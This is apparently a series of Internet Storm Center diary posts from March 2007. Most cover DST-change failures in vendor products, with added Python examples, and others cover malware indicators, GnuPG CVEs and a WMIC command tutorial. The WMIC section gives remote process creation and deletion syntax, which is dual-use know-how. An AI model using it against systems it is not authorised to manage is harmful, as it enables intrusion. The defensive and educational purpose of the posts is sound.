This issue is an incompatibility in the definition of time zone objects identified by the time zone IDs "EST", "MST" or "HST". Prior to Olson data 2005r these 3 IDs refer to zones which observe daylight savings time. For Olson data 2005r or later these 3 IDs refer to zones which do not observe daylight savings time.


Sun bug 6530336

It affects the parsing of date strings containing the strings "EDT", "HDT" or "MDT", for example "July 4th 2007, 1:00 pm EDT".


Thanks to Colm for providing the information.


Published: 2007-03-11

A DST Reminder

I almost forgot, with the change in Daylight Saving Time comes a change in batteries for the smoke detectors.  Hopefully the Energizer Bunny has done a good job of manufacturing the batteries because they will have to last 3 weeks longer. 

Thanks to my fellow handler Scott for reminding me.


Published: 2007-03-11

Daylight Saving Time Change Problem With Watchguard Fireware 8.3.1 and Watchguard System Manager 8.3.1

Again, another report from Alan.  He has had problems with Watchguard products.  Here is what he had to say:

Watchguard Fireware 8.3.1 and Watchguard System Manager 8.3.1 are reporting incorrect times and symptoms.

1) Log rolls and scheduled reports advanced one hour with DST change
2) Changing the time of the scheduled log rolls and reports to the desired time results in service shutdowns - service restarts fail with an automatic stoppage of their service - the server itself must be restarted to correct the issue.
3) Webblocker updates report having occurred one hour after the Windows scheduler task reports having launched and completed the task.

Thanks Alan for the information.


Published: 2007-03-11

Daylight Saving Time Change Issues Continue To Roll In

I can't believe that I volunteered for this shift.  The emails continue to roll in regarding things that aren't working quite right this morning.  Nothing earth shattering or causing the Internet to crash and burn, however it is making things a little tense for some folks.

We have now received reports of Cell Phones that are not updating. I am happy to say Long Lines Wireless did. (That is my provider as well as my employer).

We have had reports that the Atomic Clocks that we have in our homes are not updating. I can confirm that as well, as mine has not updated.

We have had reports of various VOIP phone issues with no time change.  Reports of BlackBerrys and other electronic devices not updating.  Reports of GPS updated devices not updating automatically.

We will keep you updated to new items that we receive.


Published: 2007-03-11

Daylight Saving Time Change Problem With CISCO Phones

We have received reports from 2 separate people indicating the time did not change correctly on CISCO phone models 7940, 7960, 7961 and others.  The readers that notified us indicated that the phones had been updated per the vendor's recommendations.  One of our readers indicated the CISCO TAC is unreachable due to volume, so my guess is that Shawn and Peter aren't the only ones that have noticed the problem.

Shawn indicated that it appears to be a Java update problem.

Thanks to Shawn and Peter for providing us with the information.


Published: 2007-03-11

Daylight Saving Time Change Problem With Symantec Backup Exec 10d and 10.1

It appears that there is also a problem with Symantec Backup Exec 10d and 10.1.  Alan, the reader who discovered the APC problem, also discovered a problem with his backup software.  Again, the software was patched and updated as recommended by Symantec.

Here is what Alan had to say:

Backup jobs previously scheduled for 11:00 PM are now scheduled for 10:00 PM despite 10d and 10.1 reportedly DST compliant http://support.veritas.com/docs/286926. Nor will it allow you to change the time back to the correct time of 11:00 PM. It reports that it will, allows the change, and reports the new time in the summary when the job is resubmitted. But the scheduled time immediately reverts back to 10:00 PM. Restarting the Backup services does not appear to correct this either, so we're now an hour off on all backups and banging our heads on our desks repeating expletives directed at certain vendors.

It looks like Alan is going to have a busy Sunday and maybe even Monday. Good Luck Alan and if you have time keep us updated to your progress on resolving the problems.


Published: 2007-03-11

Daylight Saving Time Change Problem With APC

We received an email this morning from one of our readers saying that his server that was scheduled for reboot at 3:00am did not reboot. Upon investigation he discovered that his updated and patched APC Power Management Software was the problem.

Here is what Alan had to say:

I have a box running APC Powerchute on Windows Server 2003 SP1 that was scheduled to shutdown and restart one of my systems at 3:00 AM today but didn't do the shutdown until 4:00 AM.

According to my staff, APC had reported that earlier editions of Powerchute had a DST issue, but 7.0.5 was corrected, yet this doesn't appear to be correct. The W2K3 server did update the time correctly to the new DST at 2:00 AM this morning and is reflecting the correct Eastern DST.

Further investigation shows that what actually occurred is that the DST change altered my schedule from 3:00 AM to 4:00 AM on a permanent basis. So I was attempting to verify on the APC website that the version was actually the corrected version and that this was not an error on the part of my staff.

Since then, I have checked other W2K3 boxes with this Powerchute version and found that the change actually advanced my scheduled shutdown time by one hour rather than actually correcting DST.

So it looks like a problem exists with Powerchute.

Alan indicated that he is not able to get any information from the APC web site because they have chosen today to take the site down for maintenance. 

So those of you that are running Powerchute software may want to check your systems.


Published: 2007-03-11

Reports of Daylight Saving Time Change Problems

Well it has started already. The reports are coming in from our readers of issues that they have identified.  I will update the diary today to let you know what our readers are experiencing.  Please do let us know of any issues that you have. Make sure that you indicate whether or not we can use the information in the diary.


Published: 2007-03-10


Although it's labeled as an alpha release -and therefore should really be handled with care- the idea behind firekeeper makes it worth mentioning now.

We all love snort: it's basically free, pretty good -if not the best- and has a huge community supporting it. Jan Wrobel took the power of snort and inserted it in a plug-in for Firefox. The result is an IDS/IPS inside the browser. Jan kept the ability to use Snort's rules and reused part of Snort's engine. As it is running inside the browser it even gains the ability to look inside https traffic, which at that point is no longer encrypted. Add the ability to pull in the rules remotely and it looks like something we should be watching for the future.

Note that we didn't say to go ahead and install it company wide; it's an alpha release. Test it in a controlled environment and give Jan some feedback so it'll get even better.

Swa Frantzen -- NET2S


Published: 2007-03-10

DST hype

With last minute -pun intended- patches for the DST change being released in the last few days, it's now too late to panic and go about breaking more than what you'll fix.

Let's look ahead at what's likely to be going to happen if you are in or are dealing with others in an affected area:
  • Machines that got patched, including patches for applications keeping their own independent timezone information, will likely work without a hiccup.
  • Home machines missing an update, or no longer being supported, will likely end up on the wrong time, just like the rest of the house, car and phone. Users know how to update the time (well, those that aren't owners of VCRs with a perpetually blinking 00:00 anyway). Even so, the impact of this will be mostly negligible.
  • Businesses might have meetings, conf. calls etc. where participants end up turning up at the wrong time. Simple reminders and rescheduling can fix this; nothing earth shattering will happen. And if you're working in large international businesses this mess happens more often, at every DST change where the different continents don't sync the changes, where the southern hemisphere changes in the other direction, etc.
  • Time sensitive applications in businesses that are still using local time might go wrong. The typical applications there would be logs and access control:
    • Logs: If you're used to dealing with days that don't have the 2 to 3 hour, or -worse- days where 2:30 happens twice, you're well equipped to deal with a log that's one hour off. Just record when it got straightened out and you'll be fine. If you do need to make changes, our best suggestion is to get rid of local time. UTC rules: it has far fewer changes (a leap second is about the worst that happens, and that can be automated) and it is independent of location, of politicians feeling the need to mess with time, and of DST changes.
    • Access control: Time based access control can be a bit more tricky, but if after all the media attention you still don't have a plan "B", you deserve the wrath of people who are mad at you for having been waiting for an hour locked out of the building. Even then it's not going to be all that huge of an issue.
  • Time critical systems. Well, are you sure they are time critical if you use local time? UTC rules here without a doubt!
That said, I'm sure many of you will enjoy fellow handler John Bambenek's appearance on Comedy Central's Daily Show. Sorry about the ad in front, and it's time limited, so if you want to see it in a few months, it'll likely be a broken link.
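The one-hour shift that Alan saw in Powerchute (a 3:00 AM job permanently moved to 4:00 AM, in the APC entry above) and the "UTC rules" advice in the list just above come down to the same thing: two DST tables that disagree about 12 March 2007.  The code below is an added example, not from the diary or from any vendor.  It encodes the pre-2007 US rule (first Sunday in April to last Sunday in October) and the 2007 rule (second Sunday in March to first Sunday in November), assumes US Eastern standard time (UTC-5) by default, and shows what happens when a wall-clock schedule is stored under one rule set and read back under the other.

```python
"""Why a local-time schedule jumps by an hour when DST rules disagree.

Added example, not from the diary or from any vendor. It encodes the old US
rule (first Sunday in April to last Sunday in October) and the 2007 rule
(second Sunday in March to first Sunday in November) and assumes US Eastern
standard time (UTC-5) unless told otherwise.
"""
import calendar
from datetime import date, datetime, time, timedelta, timezone

SUNDAY = 6  # date.weekday(): Monday == 0


def nth_weekday(year, month, weekday, n):
    """Date of the n-th given weekday in a month; n == -1 means the last one."""
    if n > 0:
        first = date(year, month, 1)
        return first + timedelta(days=(weekday - first.weekday()) % 7 + 7 * (n - 1))
    last = date(year, month, calendar.monthrange(year, month)[1])
    return last - timedelta(days=(last.weekday() - weekday) % 7)


# Each rule maps a year to (DST start date, DST end date).
RULES = {
    "old": lambda year: (nth_weekday(year, 4, SUNDAY, 1), nth_weekday(year, 10, SUNDAY, -1)),
    "new": lambda year: (nth_weekday(year, 3, SUNDAY, 2), nth_weekday(year, 11, SUNDAY, 1)),
}


def dst_bounds_utc(rule, year, std_offset_hours=-5):
    """UTC instants at which DST begins (02:00 standard) and ends (02:00 daylight)."""
    start_day, end_day = RULES[rule](year)
    std = timezone(timedelta(hours=std_offset_hours))
    begins = datetime.combine(start_day, time(2, 0), tzinfo=std).astimezone(timezone.utc)
    ends = datetime.combine(end_day, time(1, 0), tzinfo=std).astimezone(timezone.utc)
    return begins, ends


def is_dst(utc_dt, rule, std_offset_hours=-5):
    """True if daylight time is in effect at the given UTC instant under the rule."""
    begins, ends = dst_bounds_utc(rule, utc_dt.year, std_offset_hours)
    return begins <= utc_dt < ends


def local_to_utc(wall, rule, std_offset_hours=-5):
    """Interpret a naive wall-clock time under a rule set. The skipped and
    repeated hours on the transition days themselves are not handled specially."""
    std = timezone(timedelta(hours=std_offset_hours))
    as_standard = wall.replace(tzinfo=std).astimezone(timezone.utc)
    if is_dst(as_standard, rule, std_offset_hours):
        return as_standard - timedelta(hours=1)  # the clock was an hour ahead of standard
    return as_standard


def utc_to_local(utc_dt, rule, std_offset_hours=-5):
    """Wall-clock (naive) time for a UTC instant under a rule set."""
    offset = std_offset_hours + (1 if is_dst(utc_dt, rule, std_offset_hours) else 0)
    return utc_dt.astimezone(timezone(timedelta(hours=offset))).replace(tzinfo=None)


def schedule_drift(wall, stored_rule, displayed_rule, std_offset_hours=-5):
    """Store a local-time schedule under one rule set and read it back under another.

    Models an application with its own (stale) DST table next to an OS that has
    the new one: the stored instant is unchanged, the wall-clock label moves."""
    instant = local_to_utc(wall, stored_rule, std_offset_hours)
    return utc_to_local(instant, displayed_rule, std_offset_hours)


def drift_hhmm(year, month, day, hour, minute, stored_rule, displayed_rule):
    """Convenience wrapper returning the displayed wall-clock time as 'HH:MM'."""
    wall = datetime(year, month, day, hour, minute)
    return schedule_drift(wall, stored_rule, displayed_rule).strftime("%H:%M")


if __name__ == "__main__":
    # The reported symptom: a 03:00 job on Monday 12 March 2007 shows up at 04:00.
    print("stored with old table, shown with new:", drift_hhmm(2007, 3, 12, 3, 0, "old", "new"))
    print("both old / both new:", drift_hhmm(2007, 3, 12, 3, 0, "old", "old"),
          drift_hhmm(2007, 3, 12, 3, 0, "new", "new"))
    print("mid-summer, where the rules agree:", drift_hhmm(2007, 7, 4, 3, 0, "old", "new"))
```

The drift only exists in the three weeks in March and the week in November where the two rules disagree, which is why a fix that "passed" a test in April or July still breaks on 11 March.  Storing the schedule as a UTC instant and converting on display removes the dependency on the application's own table, which is the practical content of the "UTC rules" advice.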


Anyway, I've posted a new poll where you can show us your crystal ball skillz. I'll replace it overnight with one where you can tell us how it went. Enjoy!

Swa Frantzen -- NET2S


Published: 2007-03-10

New malware spreading through compromised sites

Early this morning, Sanjoy wrote in that the airindia.com website contained a script-tag linking to a malicious Javascript hosted on a Chinese web server. We were able to confirm this and contacted Airindia to inform them their site had likely been compromised. At this point in time, the site is clean again.

Initial verification shows that this malicious link has been introduced into a large number of sites, both through script injection in forms as well as ways that look very much like web server compromise to us.

If you have a large installed base of Windows machines with browsing access, you may wish to review your proxy logs for requests for the following files. We removed the actual domain so as not to link directly to the actual malware.

[xxx] .cn/images/163.js
[xxx] .cn/images/sina.htm

The file downloaded upon successful execution is called 'install.exe' and has an md5 checksum of f9fc3189d619462f6c939bfbf36c90ab. Once executed, it installs three files on the system, 'winboot.exe', 'winroot.bat' and '1.exe', of which the latter remains resident in memory. The software seems to be a keylogger at this point in time. Anti-virus detection for this malware was non-existent this morning, but AV vendors have been informed and are actively adding detection.

We're very interested in hearing more about this from you. If you notice the existence of this link on one of your sites and can provide us with more information on how the compromise occurred in your instance, please let us know. This type of information could prove very helpful to other victims.

Maarten Van Horenbeeck


Published: 2007-03-09

Malformed OLE and Windows Explorer

US CERT recently published some info on a vulnerability in Windows Explorer triggered by specifically malformed OLE objects.  Based on currently available information, this appears to be a relatively low-level DoS threat, without code execution capability.

We've added this to our listing of "open issues" in MS products found here.


Published: 2007-03-09

Brazilian Tax Season

Just some words of warning that we're passing along from one of our friends south of the equator: It's "IRS season" in Brazil.

With the tax season deadline of April 30th approaching, any emails that you receive with "imposto de renda", "receita federal", or requests for your CPF (Brazilian SSN) are more than likely malware.

FYI, the real URLs for the Brazilian "IRS" are:


The same warning applies to US residents: be VERY wary of any email claiming to be from the IRS.  Never, EVER send any personal financial information in email.  Never, EVER trust a link in an email that claims to be from the IRS or a financial institution.  (The upshot is this: If you're going to be careless with your life savings, then let's expedite the process-- simply bundle all of the nice engraved pictures of presidents that you have in your wallet carefully together and send them to me for safekeeping... let me know when you need 'em back...)


Published: 2007-03-09

Times... they are a'changin...

We have some additional, new DST issue "stuff" coming out of Sun and IBM:


This documents an incompatibility issue with Olson TZ Data and Sun's JDK/JREs as follows:
  • JDK and JRE v1.4.2_12 and above
  • JDK and JRE 5.0u8 and above
  • JDK and JRE 6 and above
IBM is highlighting some problems caused under the newly patched JRE/JDKs that it supplied when an app uses a three-letter TZ name (like EST, CST, MST, etc...) rather than a full length designator (like "America/New_York").  Details can be found here.


Published: 2007-03-09

Could it be Vista?

While the official Microsoft PR folks are denying the rumor, an unnamed source inside the software giant has indicated that the reason for Redmond's failure to publish updates in March may be caused by issues with Vista.  "Every time we try to push the updates, it keeps popping up these really beautiful, semi-transparent, shiny windows that say 'I'm sorry Dave, I'm afraid I can't do that.'," said our source. "We have no idea why it won't let us push the updates, and we don't know who 'Dave' is.  It's kind of annoying, but incredibly pretty."

[It's a joke... Lighten up and don't send me hate mail...  -TL]


Published: 2007-03-08

Over-Zealous OneCare Eats Some Outlook E-mail

There is an interesting post here and a detailed discussion here of a problem that has hit some users of Microsoft OneCare.  Apparently, OneCare has deleted some folks' Microsoft Outlook .PST file, destroying all of their e-mail.  There are some workarounds in the post which describe how to make OneCare stay away from your .PST file.  This is a problematic solution, because OneCare won't be able to scan for any malware in your .PST file, but it sure beats having all of your e-mail deleted!


Published: 2007-03-08

BackTrack 2.0 Released

A few days ago, the BackTrack 2.0 bootable Linux distribution was released.  For the uninitiated, BackTrack is a very powerful collection of penetration testing and security-related tools, all pulled together and integrated into a fantastic bootable Linux CD package, freely downloadable as an ISO image.

The new update is very well done, including Metasploit 2 and 3, better wireless support, and much more.  You can learn more about it here.


Published: 2007-03-08

No Microsoft Security Bulletins Planned for This Month

Woohoo!  Looks like you can take that vacation you were planning next week...  Microsoft announced that there are no Security Bulletins planned for next week's Microsoft patch Tuesday.  Frankly, that's kind of a relief.

On second thought... you might not want to take that vacation after all... instead of patching, you might be required to clean up some infected systems.

UPDATE: One of our readers requesting anonymity mentioned that this announcement may have been a result of the upcoming Sunday switch in some geographies to Daylight Saving Time.  This new schedule for DST may hose some software.  Microsoft might be trying to avoid negative interactions of new patches on Tuesday only two short days after the DST conversion.  Interesting theory!


Published: 2007-03-08

The Grammar of WMIC

Whenever I’m Handler on Duty, I typically write up a little Windows command line tip to help security people and especially incident handlers analyze and understand their Windows systems better.  Most of these articles focus on very specific ways to use a given command, usually the very powerful WMIC command included in WinXP Pro, Win2003, and WinVista.  But, you know, quite often, people tell me, “I like to use the WMIC command in this or that specific way, but I don’t really follow the underlying syntax of the thing.”  Or, I hear, “I can never remember the overall flow of the WMIC command, so I just Google every time I need to use it to get the syntax for what I want to do.”

Remember that old saying?  “Give a man a fish, and you feed him for a day.  Teach a man to fish, and you feed him for…”  Well, you remember it.  What I’d like to do with this diary posting is to describe, in I hope an understandable and memorizable way, the overall syntax for using and exploring WMIC.  Now, you may be thinking, “Well, Microsoft provides documentation of the formal WMIC syntax here.”  You were thinking that, weren’t you?  But, that Microsoft description is rather… let me try to be charitable here… obtuse.  Let’s get practical.

For an intro and overview of WMIC, please read my earlier articles.  I don’t want to regurgitate those here.  For most of the way you’ll want to use WMIC, its practical syntax is as follows:

C:\> wmic [stuff to make it run against a remote system] [alias] [where with where clause] [verb with verb clause]

Yes, there are other variations and subtleties, but this structure is how I sort WMIC out in my own head, and how I most often use it.  Let’s dissect these components.
If you don’t include the stuff to make it run against a remote system, WMIC takes effect on the local system.  To make it run against a remote system, you would include the following as the [stuff to make it run against a remote system]:

/user:[admin_user] /password:[password] /node:[machine_name]

If you don’t provide a /password on the WMIC line, it will prompt you for one after you hit ENTER.

Next, we get to the alias.  This is the component of your system that you want WMIC to interact with, such as process, startup, os, and so on.  There are many dozens of aliases.  To get a list of them, run this:

C:\> wmic /?

After the alias, we typically include a where clause that lets us specify what we really want to look for.  WMIC with where clauses makes your whole Windows machine look like a SQL database, for which you formulate queries using WQL (the WMI Query Language, which Microsoft claims is a subset of standard SQL).  Anyway, the most common form of a where clause is:

where [attribute]="[value]"

To get a list of attributes for a given alias to include in your where clauses, you could run this:

C:\> wmic [alias] get /?

Note also that where clauses can use ANDs and ORs, as in:

C:\> wmic process where (name="cmd.exe" or name="calc.exe") list brief

This command shows you a short listing of various important attributes of all processes named cmd.exe or calc.exe.

Also, we can match substrings in a where clause with the use of like and %, as in:

C:\> wmic process where (executablepath like "%system32%") list brief

This shows you a short listing of processes running out of any directory named system32 on your box.

Then, we get to the verb clause.  There are various verbs supported.  To get a list of them, you could run:

C:\> wmic [alias] /?

Let’s look at some of the most common verbs:

list: this verb shows the value of a bunch of attributes of the given instances identified by the alias and where clause.  Whew!  That sounded like gobbledygook.  Essentially, list just lists values for specific stuff.  It’s most commonly used as “list brief” (see above), which gives you one line per instance of the things you are looking at with the most important attributes listed.  The other common use is “list full” which shows all values of all attributes of the given thing we are analyzing.  Compare:

C:\> wmic process list brief

C:\> wmic process list full

Note that I’ve omitted the where clause here to look at every process on the box.

get: get retrieves specific attribute values, from a list you can specify.  So, if you only wanted to get the processID, name, and executable path for processes named cmd.exe on your box, you would run:

C:\> wmic process where name="cmd.exe" get processid, name, executablepath

This can be used to create customized reports.  Note that, unfortunately, the columns you get in the output are in a pre-baked alphabetical order by attribute name.  That is, the output will show executablepath first, name second, and processid third, because e comes before n, which comes before p.  That’s kind of a bummer, but you could write scripts or use a spreadsheet to manipulate this order.

delete: removes some entity from your system.  Be careful with this one, because it can really hose up your machine if you are not careful.  But, it can be used to kill processes, as in:

c:\> wmic process where name="cmd.exe" delete

Boom!  That’ll kill all cmd.exe processes running on the box.  That technique, when used with the right name or names, can be quite helpful in killing spyware processes and bots, by the way.

call: This is the big one.  It lets you call specific methods that are supported by that alias.  These methods could let you take all kinds of useful and sometimes crazy actions on your system.  While list and get just pull data, the call verb can be used to change stuff.  To get a set of the methods supported for a given alias, you could run:

C:\> wmic [alias] call /?

As in:

C:\> wmic process call /?

C:\> wmic nicconfig call /?

There are some quite interesting methods in the process and nicconfig aliases as you can see above.  The verb clause is a set of parameters you might pass into the verb, which, for the call verb could be some parameters that the method requires, as in:

C:\> wmic process call create cmd.exe

This command calls the create method in the process alias to make a new process named cmd.exe, a new command prompt running on your box.  I’ve found this technique useful in kicking off a background anti-virus or anti-spyware scan executable with some AV and AS products that support command-line use.

So, there you have it… by combining these various aspects, you can explore WMIC to your heart’s content.  I hope you have fun with this stuff!
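To tie the pieces together, here is an added Python helper (my own example, not from Ed's diary or from Microsoft) that assembles a WMIC command line in exactly the order described above, [remote switches] [alias] [where clause] [verb clause], and that parses WMIC's /format:csv output so the columns of a get report come back in the order you asked for instead of the alphabetical order complained about above. /format:csv is a real WMIC switch; the sample output below is constructed, and the UTF-16 handling of redirected WMIC output is my assumption about how it behaves, not something the diary states.

```python
import csv
import shutil
import subprocess


def build_wmic(alias, where=None, verb="list brief",
               node=None, user=None, password=None):
    """Assemble argv in the diary's order:
    [remote switches] [alias] [where clause] [verb clause]."""
    argv = ["wmic"]
    if node:                          # no /node means WMIC acts on the local box
        if user:
            argv.append("/user:" + user)
        if password:                  # leave it out and WMIC prompts for it
            argv.append("/password:" + password)
        argv.append("/node:" + node)
    argv.append(alias)
    if where:                         # e.g. "name='cmd.exe'" or "(name='a' or name='b')"
        argv += ["where", where]
    argv += verb.split()              # "get processid,name" -> ["get", "processid,name"]
    return argv


# Constructed sample of what `wmic process where name='cmd.exe'
# get processid,name,executablepath /format:csv` returns: note the leading
# blank line, the extra Node column and the alphabetical column order.
SAMPLE_CSV = r"""
Node,ExecutablePath,Name,ProcessId
WORKSTN1,C:\Windows\System32\cmd.exe,cmd.exe,1234
WORKSTN1,C:\Windows\System32\cmd.exe,cmd.exe,5678
"""


def parse_csv_output(text, columns):
    """Parse /format:csv output and return rows with the columns in the
    order requested (matched case-insensitively), undoing the alphabetical layout."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    reader = csv.DictReader(lines)
    by_lower = {name.lower(): name for name in reader.fieldnames}
    return [[rec[by_lower[c.lower()]] for c in columns] for rec in reader]


def run_query(alias, where, columns):
    """Run the query on a box that has wmic; return None anywhere else.
    Assumption: redirected WMIC output is UTF-16 when NUL bytes show up."""
    if shutil.which("wmic") is None:
        return None
    argv = build_wmic(alias, where, "get " + ",".join(columns)) + ["/format:csv"]
    raw = subprocess.run(argv, capture_output=True, check=False).stdout
    if b"\x00" in raw[:4]:
        text = raw.decode("utf-16", errors="replace")
    else:
        text = raw.decode(errors="replace")
    return parse_csv_output(text, columns)


if __name__ == "__main__":
    print(build_wmic("process", "name='cmd.exe'", "get processid,name,executablepath"))
    for row in parse_csv_output(SAMPLE_CSV, ["processid", "name", "executablepath"]):
        print(row)
    print(run_query("process", "name='cmd.exe'", ["processid", "name", "executablepath"]))
```

Note the where clause is passed as one argument with the value in single quotes, the form that survives cmd.exe quoting; on a machine without wmic, run_query() returns None and the parsing can still be exercised on the sample.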

--Ed Skoudis
Handler on Duty


Published: 2007-03-07

Building a remote buffer overflow for the Snort 2.6.1 DCE/RPC flaw

Every so often I get asked about buffer overflow research in practice and for once there is a lengthy, worked-out example for me to point at.

Trirat Puttaraksa recently blogged in two parts his work in turning the Snort 2.6.1 DCE/RPC flaw into a working exploit. The first part discusses the "easy bit", that is to say how to turn the vulnerability into a denial-of-service attack whereas the second part discusses how to exploit it to actually execute code.

It is a very thorough write-up, including pretty pictures explaining how he uses the Snort source code to figure out the layout of the packets he is going to send, the setup of the packets to ensure that he triggers the fault and, in part 2, how to inject the payload to execute.  The final result is that he runs calc.exe from Snort.


Published: 2007-03-06

When encoding trumps encryption (or: the latest GnuPG issue)

The latest GnuPG security advisory is, in the specific case of GnuPG itself, more of a "Human-Computer Interaction" issue than a security hole proper. The flaw is not in the encryption but in the way in which OpenPGP, the standard format for transmitting PGP-encrypted data, is interpreted by GnuPG "helpers" such as Enigmail and by mail programs such as Evolution, KMail, etc.

An OpenPGP-compliant message can be made up of multiple sections, not all of which need to be signed or encrypted. The "helpers" and mail software do not use the GnuPG API correctly to interpret where the sections start and end, leading to something called "injection", which is a fancy name for "adding untrusted data which is indistinguishable from trusted data".

Translated: you see the pretty icon telling you that the whole message is encrypted and signed whereas there is a section of it (text, image, binary, whatever) which isn't.

What if you use GnuPG "raw"? Well, the visual cues are insufficient even for an advanced user and this is why a new release of GnuPG is being distributed and relevant CVE numbers were issued.

To give you an idea of the extent of the issue here are the CVE numbers:
  • CVE-2007-1263 - for the visual distinction issues in GnuPG itself, all 4 attacks.
  • CVE-2007-1264 - Enigmail improper use of --status-fd
  • CVE-2007-1265 - KMail improper or non-existing use of --status-fd
  • CVE-2007-1266 - Evolution improper or non-existing use of --status-fd
  • CVE-2007-1267 - Sylpheed improper or non-existing use of --status-fd
  • CVE-2007-1268 - Mutt improper or non-existing use of --status-fd
  • CVE-2007-1269 - GNUMail improper or non-existing use of --status-fd
Please note that the list is not exhaustive; for example I use GPGMail for Apple's Mail.app and I have yet to test whether it is vulnerable.
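To make "improper use of --status-fd" concrete, here is an added Python example (mine, not from the advisory or from any of the listed front-ends) that parses the machine-readable status lines GnuPG writes to --status-fd and only reports a message as signed when a good signature is present and exactly one PLAINTEXT section was decrypted; a second PLAINTEXT line means there is a section the signature says nothing about. Beside it sits the shortcut the advisory warns against: pattern-matching "Good signature" in the human-readable output, which says "signed" for the very same message. The status keywords (PLAINTEXT, GOODSIG, BADSIG, ERRSIG, DECRYPTION_OKAY and so on) are the ones GnuPG documents; the sample output, key ids and user ids are constructed.

```python
from dataclasses import dataclass, field

STATUS_PREFIX = "[GNUPG:] "

# Constructed status-fd output for a message with TWO plaintext sections,
# only the first of which carries the signature (ids and names are made up).
MIXED_STATUS = """\
[GNUPG:] ENC_TO 0123456789ABCDEF 1 0
[GNUPG:] BEGIN_DECRYPTION
[GNUPG:] PLAINTEXT 62 1173225600 body.txt
[GNUPG:] SIG_ID CONSTRUCTEDSIGID 2007-03-06 1173225600
[GNUPG:] GOODSIG 0123456789ABCDEF Alice Example <alice@example.org>
[GNUPG:] DECRYPTION_OKAY
[GNUPG:] END_DECRYPTION
[GNUPG:] PLAINTEXT 62 1173225600 extra.txt
"""

# Constructed status-fd output for a clean message: one section, one signature.
CLEAN_STATUS = "\n".join(
    ln for ln in MIXED_STATUS.splitlines() if not ln.endswith("extra.txt")) + "\n"

# Constructed human-readable stderr that accompanies MIXED_STATUS: what a
# front-end sees if it only looks at gpg's text output.
MIXED_STDERR = """\
gpg: encrypted with 2048-bit RSA key, ID 89ABCDEF, created 2007-01-01
gpg: Good signature from "Alice Example <alice@example.org>"
"""


@dataclass
class StatusSummary:
    plaintexts: int = 0                 # one PLAINTEXT line per decrypted section
    good_sigs: list = field(default_factory=list)
    bad_sigs: list = field(default_factory=list)
    decrypted_ok: bool = False


def parse_status_fd(text):
    """Read the machine-parseable lines GnuPG writes to --status-fd."""
    summary = StatusSummary()
    for line in text.splitlines():
        if not line.startswith(STATUS_PREFIX):
            continue                                   # ordinary stderr chatter
        keyword, _, args = line[len(STATUS_PREFIX):].partition(" ")
        if keyword == "PLAINTEXT":
            summary.plaintexts += 1
        elif keyword == "GOODSIG":
            summary.good_sigs.append(args)
        elif keyword in ("BADSIG", "ERRSIG"):
            summary.bad_sigs.append(args)
        elif keyword == "DECRYPTION_OKAY":
            summary.decrypted_ok = True
    return summary


def verdict(summary):
    """Say SIGNED only when one section exists and a good signature covers it."""
    if summary.bad_sigs:
        return "BAD"
    if not summary.good_sigs:
        return "UNSIGNED"
    if summary.plaintexts != 1:
        return "MIXED"        # extra section(s) the signature does not cover
    return "SIGNED"


def naive_verdict(stderr_text):
    """Text matching on the human-readable output: the shortcut to avoid."""
    return "SIGNED" if "Good signature from" in stderr_text else "UNSIGNED"


if __name__ == "__main__":
    print("status-fd says:", verdict(parse_status_fd(MIXED_STATUS)))   # MIXED
    print("text match says:", naive_verdict(MIXED_STDERR))             # SIGNED
```

In practice the front-end would run gpg with --status-fd pointing at a pipe and hand that pipe's contents to parse_status_fd(); the exact set of status lines a given GnuPG version emits is in its doc/DETAILS file.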


Published: 2007-03-06

Time for an Xb0t 360?

It was only a matter of time until someone discovered an interesting vulnerability in the Xbox 360...

So, what is the cunning plan?  Well, the designers of the Xbox 360 (which is, incidentally, PowerPC-based) went to extreme lengths to try to make it "unhackable" and chose a hypervisor design in which, unlike previous generations of gaming consoles, games no longer take over the system. There is a thin "operating system" which the games communicate with using a classic syscall ("excuse me Mr. kernel, could you please do something for me?").

Since everything goes via the syscall then, theoretically, all you need to do is armor the syscall to keep everything nice and secure.


Looks like the syscall implementation didn't adequately check the parameters being passed for correctness and consistency allowing a privilege escalation attack. As a matter of fact if you read the actual description you will notice that it is a subtle bug with one instruction in the validation path only looking at 32 bits of a 64-bit register with a subsequent instruction acting on all 64 bits.

Now for the good news:  this has been patched since January 7th 2007.

Can an Internet-connected games console be an interesting addition to the available systems for a botnet? Difficult question to answer trivially: there are many parameters to the game. 

On the one side you have the low-latency, high-speed DSL lines favoured by gamers, but on the other side you have a totally novel operating system to develop for, not to mention how much of the time these systems are actually connected.  What are the chances of a games console being left on 24x7 compared to a home PC on a DSL link? So we are probably back to the old story of "return on investment": is it worth my while to develop a new engine and virus to go after the Xbox 360s? Probably not; there are still plenty of Windows systems which will do just fine.

A final note: if you are technically minded the vulnerability description is very well written and a fascinating read.


Published: 2007-03-05

Comparing Anti-Virus Solutions

Every so often we get requests from readers asking us about comparisons between the different anti-virus products. These requests range from advice on how to do such a comparison oneself to ready-made comparison reports.


Typically we use VirusTotal output in a lot of the diaries we write, as it gives a good overview of which vendors detect a given piece of malware and what each of them names it. E.g.:

Antivirus Version Update Result
AntiVir 20070305 TR/Dldr.Small.ego.55
Authentium 4.93.8 20070305 -
Avast 4.7.936.0 20070305 -
AVG 20070305 Downloader.Generic3.VCI
BitDefender 7.2 20070305 Dropped:Trojan.Rootkit.AN
CAT-QuickHeal 9.00 20070305 -
ClamAV devel-20060426 20070305 -
DrWeb 4.33 20070305 -
eSafe 20070305 Win32.Small.ego
eTrust-Vet 30.6.3455 20070305 -
Ewido 4.0 20070305 Downloader.Small.ego
F-Prot 20070304 -
F-Secure 6.70.13030.0 20070305 Trojan-Downloader.Win32.Small.ego
FileAdvisor 1 20070306 -
Fortinet 20070305 W32/Small.EGO!tr.dldr
Ikarus T3.1.1.3 20070305 Trojan-Downloader.Win32.Small.ego
Kaspersky 20070305 Trojan-Downloader.Win32.Small.ego
McAfee 4976 20070305 -
Microsoft 1.2204 20070305 -
NOD32v2 2097 20070305 Win32/Wigon.K
Norman 5.80.02 20070305 W32/DLoader.CDZC
Panda 20070305 -
PandaBeta 20070305 -
Prevx1 V2 20070306 -
SAVMail 1.0 20070302 -
Sophos 4.15.0 20070305 Troj/Agent-ECZ
Sunbelt 2.2.907.0 20070305 -
Symantec 10 20070306 -
TheHacker 20070305 -
UNA 1.83 20070305 TrojanDownloader.Win32.Small.C329
VBA32 3.11.2 20070305 Trojan-Downloader.Win32.Small.ego
VirusBuster 4.3.19:9 20070305 -

Name ccc.exe
Size 23040
md5 46241d432831fec22fd38c135ab96523
sha1 9d3dbf5c11779b4aceed2b2b2ff3735e9c483997
Date scanned 03/06/2007 00:52:27 (CET)

